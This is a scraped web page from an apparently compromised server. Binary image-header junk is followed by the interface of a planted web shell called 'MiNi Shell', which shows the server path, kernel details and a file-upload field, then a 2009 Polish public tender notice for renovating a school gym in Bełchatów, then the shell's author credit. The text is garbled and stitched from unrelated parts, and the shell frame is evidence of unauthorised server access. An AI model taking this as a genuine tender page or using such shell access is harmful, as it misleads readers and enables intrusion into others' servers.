JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090902/145465-N-2009.html

<p class="kh_header"><b>Bełchatów: Remont części sportowej - sali gimnastycznej wraz z zapleczem
przy ZSP Nr 3 w Bełchatowie</b><br>
<b>Numer ogłoszenia: 145465 - 2009; data zamieszczenia: 02.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu w Bełchatowie , ul. Pabianicka 17/19, 97-400 Bełchatów, woj. łódzkie, tel. 044 6358600, faks 044 6358617.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-belchatowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont części sportowej - sali gimnastycznej wraz z zapleczem
przy ZSP Nr 3 w Bełchatowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Przedmiotem zamówienia jest remont części sportowej - sali gimnastycznej wraz z zapleczem przy
ZSP Nr 3 w Bełchatowie. Budynek wykonany jest w technologii uprzemysłowionej, szkielet
prefabrykowany, stropy kanałowe, ściany osłonowe z płyt gazobetonowych.
Zakres robót obejmuje:
3.1.1 Sala gimnastyczna - branża budowlana:
A. Prace demontażowe i rozbiórkowe:
- cyklinowanie parkietu,
- demontaż listew przyściennych drewnianych,
- demontaż parapetów drewnianych, demontaż obudów grzejników,
- demontaż drabinek drewnianych na okres malowania,
- wykucie z muru ościeżnic drzwi pomieszczeń przylegających do sali, wejściowych,
na trybuny oraz korytarza wyjściowego z hali
- demontaż kratek stalowych wywietrzaków dachowych,
- wykucie z ścian kratek wentylacji grawitacyjnej,
- demontaż ścianki gipsowo-kartonowej w pokoju nauczycielskim-zapleczu,
- demontaż boazerii nad trybunami,
- demontaż wykładziny PCV ( w pom. nauczycieli + zaplecze),
- szlifowanie, frezowanie posadzki z lastrica,
- czyszczenie konstrukcji stalowej dachu wraz z zabezpieczeniem folią PCV przed
zabrudzeniem parkietu,
- czyszczenie z lakieru ławek i barierek trybun,
- mycie, odtłuszczenie sufitów i ścian hali oraz pom. przyległych,
- demontaż glazury w pom. nauczycieli,
- wywóz gruzu z demontażu i rozbiórki.
B. Prace montażowe:
- naprawa, cyklinowanie, gruntowanie, malowanie parkietu oraz montaż listew
przypodłogowych,
- malowanie linii boiskowych na parkiecie,
- montaż parapetów okien z PCV w kolorze brąz oraz obudowy grzejników,
- montaż oraz renowacja istniejących drabinek wcześniej zdemontowanych,
- montaż drzwi drewnianych w komplecie z ościeżnicami typu PORTA, drzwi PCV oraz
drzwi drewnianych w komplecie z ościeżnicami (łazienkowe),
- montaż listew przypodłogowych w drzwiach aluminiowych,
- montaż okna uchylnego PCV wraz z żaluzją antywłamaniową,
- montaż wywietrzaków dachowych w sali oraz kratek wentylacyjnych w pom. przyległych,
- wykonanie -montaż ścianki z płyty gipsowo-kartonowej ognioodpornej w pom. nauczycieli,
- gruntowanie, malowanie sufitu oraz ścian hali oraz gipsowanie pomieszczeń przyległych,
- wymurowanie ścianki z cegły dziurawki w pom. nauczycieli celem wydzielenia pom.
prysznica, tynkowanie ścian, gruntowanie, montaż glazury w miejscu wydzielonym oraz
tzw. fartuch umywalki,
- gipsowanie, gruntowanie i malowanie ścian pomieszczeń przyległych oraz ścian nad
trybunami,
- montaż tynku kamyczkowego w miejscu zdemontowanej boazerii,
- wykonanie wylewki samopoziomującej, gruntowanie, montaż terakoty (pom. nauczycieli,
korytarz) wraz z cokolikiem,
- naprawa ławek na trybunach, malowanie kolorowe,
- malowanie konstrukcji stalowej dachu w systemie farb np. Sika, Hadrokor, Tikurila.
3.1.2 Pomieszczenia sanitarne z komunikacją przyległą - branża budowlana:
A. Prace demontażowe i rozbiórkowe:
- wykucie z muru ościeżnic stalowych drzwi,
- wykucie z muru kratek wentylacyjnych,
- demontaż kratek stalowych w kanałach wentylacji mechanicznej,
- wykucie z muru ościeżnic drewnianych okien wewnętrznych w szatniach,
- demontaż płytek ściennych i podłogowych,
- demontaż kratek ściekowych,
- mycie i odtłuszczanie kanałów wentylacji mechanicznej, rur kanalizacji sanitarnej,
- mycie i skrobanie ścian i sufitów,
- wywóz gruzu z demontażu i rozbiórki,
B. Prace montażowe:
- montaż drzwi drewnianych w komplecie z ościeżnicami typu PORTA,
- montaż okien PCV (okna wewnętrzne, stałe 2-u dzielne w pom. szatni) ,
- wyrównanie tynkiem ścian po skuciu glazury, gruntowanie, montaż glazury typu
OPOCZNO,WŁOSZCZOWA gat. I,
- wyrównanie posadzek po skuciu terakoty z wyprofilowaniem do kratek ściekowych,
wykonanie izolacji z folii płynnej w pom. prysznicy, wykonanie wylewki
samopoziomującej, montaż płytek podłogowych, antypoślizgowych klasa B gat. I, montaż
kratek ściekowych aluminiowych,
- gruntowanie, gipsowanie ścian powyżej glazury i sufitów wraz z malowaniem 2-krotnym
farbą emulsyjną,
- dwukrotne malowanie kanałów wentylacji mechanicznej, rur kanalizacji sanitarnej i rur
wody,
- montaż kratek wentylacji grawitacyjnej PCV i kratek stalowych wentylacji mechanicznej
3.1.3. Remont sali gimnastycznej z zapleczem - branża sanitarna:
- montaż wentylatora łazienkowego BF 100,
- montaż kanału i kształtek dn 100 Spiro łączących wentylator łazienkowy z przewodem
kominowym,
- demontaż umywalki z baterią i podejściami,
- wykonanie odcinków instalacji wodociągowej i kanalizacji (podejścia do natrysku
i umywalki),
- montaż umywalki z półpostumentem i baterią stojącą,
- montaż brodzika natryskowego z kabiną szklaną 90X90 cm,
- montaż baterii natryskowej i zestawu natryskowego,
- wykonanie bruzd i przekuć pod instalacje, pom. 7, 8, 9 i 12, 13, 14 - natryski
z sanitariatami,
- wykonanie wymiany 4 umywalek z bateriami (baterie czasowe),
- wymiana podejść wod.- kan. do projektowanych umywalek,
- wymiana 4 muszli sedesowych z dolnopłukami na urządzenia kompaktowe,
- wymiana 6 kratek ściekowych przy natryskach na syfony posadzkowe z regulowaną
wysokością (wandaloodporne),
- wymiana 24 baterii natryskowych i zestawów natryskowych na podścienne baterie czasowe
i wylewki podtynkowe f-my PRESTO lub DELABIE,
- przeróbki lub wymiana rur stalowych ocynkowanych ( w zależności od stwierdzonego stanu
technicznego),
- wykonanie bruzd i otworów w ścianach,
- zabetonowanie bruzd.
3.1.4. Remont sali gimnastycznej z zapleczem - branża elektryczna:
A. Instalacja zasilająca:
Dla celów zasilania odbiorników w sali gimnastycznej projektuje się wymianę istniejącej rozdzielni
RO-7 (wyposażenie rozdzielni zasilające wyremontowane obwody wykorzystać przy wymianie
rozdzielni). Rozdzielnie wykonać w obudowie do zabudowy aparatów modułowych w układzie
sieciowym TN-S. Przewód PE rozdzielni uziemić. Stopień szczelności rozdz. IP20. Zasilanie
pozostaje bez zmian.
B. Instalacja oświetleniowa:
Zasilanie oświetlenia odbywać się będzie instalacją układaną pod tynkiem przewodami YDYżo
3(5)x1,5 mm2. Zaprojektowano oświetlenie ogólne w oparciu o oprawy świetlówkowe i żarowe.
Rozmieszczone równomiernie na stropie. Stosować świetlówki o barwie ciepło-białej. Sterowanie
oświetleniem będzie indywidualne dla każdego z pomieszczeń za pomocą łączników
klawiszowych. Łączniki oświetleniowe montować na wysokości 1,4m od podłogi. Typy opraw
podano na rysunkach planu instalacji elektrycznej.
C. Instalacja gniazd wtykowych:
Zasilanie gniazd 220V odbywać się będzie instalacją układaną pod tynkiem. Do wykonania
instalacji zastosować przewody YDYżo 3x2,5mm2. Rozmieszczenie gniazd wtykowych
zaprojektowano zgodnie wymogami funkcjonalnymi. W pomieszczeniach łazienek zamontować
gniazda 230V hermetyczne podtynkowe. W pozostałych pomieszczeniach przewidziano gniazda
podtynkowe podwójne. Gniazda montować na wysokości 1,2m od podłogi.
D. Instalacja wentylacji:
System wentylacji szatni i sali gimnastycznej pozostaje bez zmian. Do istniejących wentylatorów
zamontowanych w wentylatorni i na dachu należy wymienić przewody zasilające. Sterowanie
wykonać z kaset sterowniczych zamontowanych wg wskazań obsługi.
E. Ochrona przed porażeniem prądem elektrycznym:
Zgodnie z przyjętym systemem ochrony przeciwporażeniowej w instalacjach prądu przemiennego
230/400V, 50Hz zastosowano układ TN-S. Jako środek od porażeń elektrycznych przewidziano
samoczynne wyłączenie zasilania w przypadku wystąpienia uszkodzenia izolacji. Dopuszczalne
czasy trwania zwarć przyjęto wg aktualnie obowiązującej normy PN-EN 60364-4-41.
Dla spełnienia wymogów samoczynnego wyłączenia zasilania przewód PE we wszystkich
oprawach podłączyć do obudowy , a w gniazdach 230V do bolca ochronnego.
Po wykonaniu instalacji, przed ich oddaniem do eksploatacji należy wykonać pomiary
skuteczności działania ochrony przeciwporażeniowej wszystkich odbiorników.
Ofertę należy sporządzić w oparciu o dokumentację projektową - przedmiar robót należy
traktować jako informacyjny.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.33.00.00-9, 45.33.12.10-1, 45.30.00.00-0, 45.31.00.00-3, 45.31.12.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona wadium w wysokości: 10.000 zł.
(słownie: dziesięć tysięcy złotych 00/100);
2. Wadium musi być wniesione przed upływem terminu składania ofert wskazanym
w pkt 12.1 SIWZ.
3. Wykonawca może wnieść wadium w jednej lub kilku następujących formach:
1) pieniądzu, przelewem na rachunek bankowy Zamawiającego w Banku Spółdzielczym
w Bełchatowie 64 8965 0008 2001 0005 5273 0003 z adnotacją: WADIUM
PRZETARGOWE - Remont części sportowej - sali gimnastycznej wraz z
zapleczem przy ZSP Nr 3 w Bełchatowie,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo
- kredytowej, z tym że poręczenie kasy jest zawsze zobowiązaniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust 5 pkt. 2 ustawy
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości
( Dz. U. z 2007r. Nr 42, poz. 275 z późn, zm.).
4. Jeżeli wadium zostanie wniesione w pieniądzu, Wykonawca dołączy do oferty kserokopię
wpłaty wadium z potwierdzeniem dokonanej wpłaty. W pozostałych przypadkach wymagane jest
dołączenie oryginału dokumentu wystawionego na rzecz Zamawiającego. Dokumenty, o których
mowa w pkt 3 ppkt 2-5 muszą zachowywać ważność przez cały okres, w którym Wykonawca jest
związany ofertą.
5. Wadium udzielone w innej formie niż pieniężna winno być wystawione na: Powiat
Bełchatowski reprezentowany przez Zarząd Powiatu, ul. Pabianicka 17/19, 97-400 Bełchatów.
6. Oryginał dokumentu wadium udzielonego w innej formie niż pieniężna należy dołączyć
do oferty.
7. Zamawiający będzie dokonywał zwrotu wadium zgodnie z zasadami określonymi w art. 46
ustawy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia, określonego w niniejszym ogłoszeniu mogą ubiegać się Wykonawcy, którzy:
1. spełniają warunki określone przepisami art. 22 ust. 1 ustawy Prawo zamówień publicznych;
2. nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo
zamówień publicznych;
3. wykażą, że dysponują co najmniej jedną osobą posiadającą określone przepisami uprawnienia
budowlane do kierowania robotami budowlanymi :
- w zakresie robót konstrukcyjno - budowlanych bez ograniczeń lub w ograniczonym zakresie
i zaświadczenie o wpisie do właściwej izby samorządu zawodowego,
- w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych, bez ograniczeń
lub w ograniczonym zakresie i posiadających zaświadczenie o wpisie do właściwej izby
samorządu zawodowego,
- w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,
gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub w ograniczonym zakresie
i posiadających zaświadczenie o wpisie do właściwej izby samorządu zawodowego,
4. udzielą minimum 5 lat gwarancji a maksymalnie 10 lat gwarancji licząc od daty odbioru
końcowego.
5. Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca
spełnia lub nie spełnia poszczególnych warunków..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 6. Wykaz oświadczeń i dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia
spełniania warunków udziału w postępowaniu.
6.1. Dokumenty i oświadczenia wymagane w postępowaniu
Wykonawca zobowiązany jest złożyć w terminie wskazanym w pkt 12.1 i w formie określonej
w pkt 10 SIWZ:
6.1.1. Ofertę składającą się z:
1. wypełnionego formularza ofertowego o treści zgodnej z określoną we wzorze stanowiącym
załącznik Nr 1 do SIWZ,
2. dokumentów wymienionych w pkt 6.1.2 niniejszej specyfikacji,
3. druku wykazu części zamówienia, które Wykonawca zamierza zlecić podwykonawcom
- z wykorzystaniem wzoru stanowiącego załącznik nr 4 do SIWZ.
6.1.2 Oświadczenia oraz dokumenty potwierdzające spełnianie warunków, o których mowa
w pkt 5 SIWZ
1. oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1
oraz art. 24 ust. 1 i 2 ustawy - z wykorzystaniem wzoru określonego w załączniku Nr 2 do
SIWZ,
2. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji
działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub
zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6
miesięcy przed upływem terminu składania ofert,
3. aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że
Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane
prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie
w całości wykonania decyzji właściwego organu podatkowego - wystawione nie wcześniej
niż 3 miesiące przed upływem terminu składania ofert,
4. aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy
Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie
zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne,
lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na
raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -
wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
5. dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia
posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich
uprawnień. Dokumenty potwierdzające uprawnienia osób wskazanych w pkt 5.3 SIWZ.
6. formularz ofertowy - z wykorzystaniem wzoru określonego w załączniku nr 1 do SIWZ,
7. kosztorysy ofertowe opracowane metodą kalkulacji szczegółowej zgodnie
z rozporządzeniem Ministra Rozwoju Regionalnego i Budownictwa z dnia 13 lipca
2001 roku w sprawie metod kosztorysowania obiektów i robót budowlanych
(Dz. U. z 2001 r. Nr 80 poz. 867)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 70</li>
<li>2 - Termin wykonania zamówienia - 20</li>
<li>3 - Gwarancja - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.e-bip.pl / Bełchatów powiat ziemski/zamówienia pbuliczne.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo
Powiatowe w Bełchatowie ul. Pabianicka 17/19 97-400 Bełchatów Wydział Zamówień Publicznych
i Inwestycji.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2009 godzina 09:00, miejsce: Starostwo Powiatowe w Bełchatowie ul. Pabianicka 17/19 97-
400 Bełchatów Sekretariat III piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com